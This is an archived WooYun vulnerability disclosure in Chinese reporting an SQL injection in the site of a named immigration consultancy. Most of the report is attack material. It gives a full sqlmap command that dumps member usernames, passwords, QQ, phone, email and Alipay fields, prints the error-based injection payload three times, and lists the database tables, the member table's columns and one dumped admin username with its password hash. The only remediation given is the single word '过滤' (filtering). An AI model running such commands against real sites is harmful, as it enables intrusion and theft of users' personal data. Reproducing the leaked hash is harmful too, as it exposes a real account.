乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-01: 细节已通知厂商并且等待厂商处理中 2015-12-02: 厂商已经确认,细节仅向厂商公开 2015-12-12: 细节向核心白帽子及相关领域专家公开 2015-12-22: 细节向普通白帽子公开 2016-01-01: 细节向实习白帽子公开 2016-01-16: 细节向公众公开
御国天下移民顾问有限公司主站存在SQL注射漏洞(管理密码泄露)
地址:http://**.**.**.**/about.php?aid=9
$ python sqlmap.py -u "http://**.**.**.**/about.php?aid=9" -p aid --technique=BE --random-agent --batch -D worldvisa -T php_members -C username,password,qq,telephone,email,alipay,mobile --dump
---Parameter: aid (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: aid=9' AND (SELECT 8311 FROM(SELECT COUNT(*),CONCAT(0x71626a6b71,(SELECT (ELT(8311=8311,1))),0x7171626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'knoB'='knoB---web application technology: Apacheback-end DBMS: MySQL 5.0current user: 'worldvisa_f@localhost'current user is DBA: Falsedatabase management system users [1]:[*] 'worldvisa_f'@'localhost'Database: worldvisa+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| php_product | 292 || php_product_dir | 102 || php_service | 33 || php_menu | 15 || php_link | 12 || php_down_dir | 9 || php_feedback | 9 || php_comment_list | 7 || php_mpb | 7 || php_article_dir | 6 || php_article_include | 6 || php_photo_dir | 6 || php_about | 5 || php_groups | 5 || php_about_include | 3 || php_case_include | 3 || php_down | 3 || php_news | 3 || php_news_dir | 3 || php_news_include | 3 || php_plugins | 3 || php_product_include | 3 || php_article | 2 || php_article_dir_include | 2 || php_blog_logs | 2 || php_blog_logs_dir | 2 || php_blog_photo_dir | 2 || php_down_dir_include | 2 || php_down_include | 2 || php_link_include | 2 || php_mpb_dir | 2 || php_person | 2 || php_photo | 2 || php_product_orders | 2 || php_stat | 2 || php_about_setup | 1 || php_ad | 1 || php_blog_logs_dir_include | 1 || php_blog_logs_include | 1 || php_blog_setup | 1 || php_case | 1 || php_case_dir | 1 || php_case_dir_include | 1 || php_comment | 1 || php_contact | 1 || php_contact_include | 1 || php_guest | 1 || php_members | 1 || php_mpb_dir_include | 1 || php_mpb_include | 1 || php_news_dir_include | 1 || php_person_include | 1 || php_photo_dir_include | 1 || php_photo_include | 1 || php_product_dir_include | 1 || php_resource | 1 || php_resource_dir | 1 || php_resource_dir_include | 1 || php_resource_include | 1 || php_service_include | 1 || php_setup | 1 || php_smtpmail | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 1671 || SESSION_VARIABLES | 329 || GLOBAL_VARIABLES | 317 || GLOBAL_STATUS | 312 || SESSION_STATUS | 312 || STATISTICS | 229 || COLLATION_CHARACTER_SET_APPLICABILITY | 197 || COLLATIONS | 197 || PARTITIONS | 115 || TABLES | 115 || KEY_COLUMN_USAGE | 75 || TABLE_CONSTRAINTS | 75 || CHARACTER_SETS | 39 || PLUGINS | 23 || SCHEMA_PRIVILEGES | 18 || ENGINES | 9 || SCHEMATA | 2 || PROCESSLIST | 1 || USER_PRIVILEGES | 1 |+---------------------------------------+---------+
Database: worldvisaTable: php_product[292 entries]
---Parameter: aid (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: aid=9' AND (SELECT 8311 FROM(SELECT COUNT(*),CONCAT(0x71626a6b71,(SELECT (ELT(8311=8311,1))),0x7171626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'knoB'='knoB---web application technology: Apacheback-end DBMS: MySQL 5.0Database: worldvisaTable: php_members[38 columns]+--------------+-----------------------+| Column | Type |+--------------+-----------------------+| address | varchar(150) || adminid | tinyint(1) || alipay | varchar(80) || available | tinyint(2) || avatar | varchar(150) || bday | varchar(10) || bmonth | varchar(10) || byear | varchar(10) || city | varchar(50) || content | text || credits | int(10) || edulevel | varchar(30) || email | varchar(50) || gender | tinyint(1) || groupid | smallint(6) unsigned || homepage | varchar(100) || idcard | varchar(80) || idtype | varchar(30) || income | varchar(30) || industry | varchar(30) || invisible | tinyint(1) || lastactivity | int(10) unsigned || lastpost | int(10) unsigned || mobile | varchar(50) || msn | varchar(80) || occupation | varchar(30) || oltime | smallint(6) unsigned || pageviews | mediumint(8) unsigned || password | varchar(32) || postid | varchar(20) || posts | mediumint(8) unsigned || qq | varchar(15) || regdate | int(10) unsigned || regip | varchar(15) || telephone | varchar(50) || truename | varchar(100) || uid | mediumint(8) unsigned || username | varchar(15) |+--------------+-----------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: aid (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: aid=9' AND (SELECT 8311 FROM(SELECT COUNT(*),CONCAT(0x71626a6b71,(SELECT (ELT(8311=8311,1))),0x7171626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'knoB'='knoB---web application technology: Apacheback-end DBMS: MySQL 5.0Database: worldvisaTable: php_members[1 entry]+----------+----------------------------------+---------+-----------+---------+---------+---------+| username | password | qq | telephone | email | alipay | mobile |+----------+----------------------------------+---------+-----------+---------+---------+---------+| 020jt | d6a74d5ead4c725ed869d90d5660991e | <blank> | <blank> | <blank> | <blank> | <blank> |+----------+----------------------------------+---------+-----------+---------+---------+---------+
过滤。
危害等级:高
漏洞Rank:13
确认时间:2015-12-02 10:58
Referred to related parties.
暂无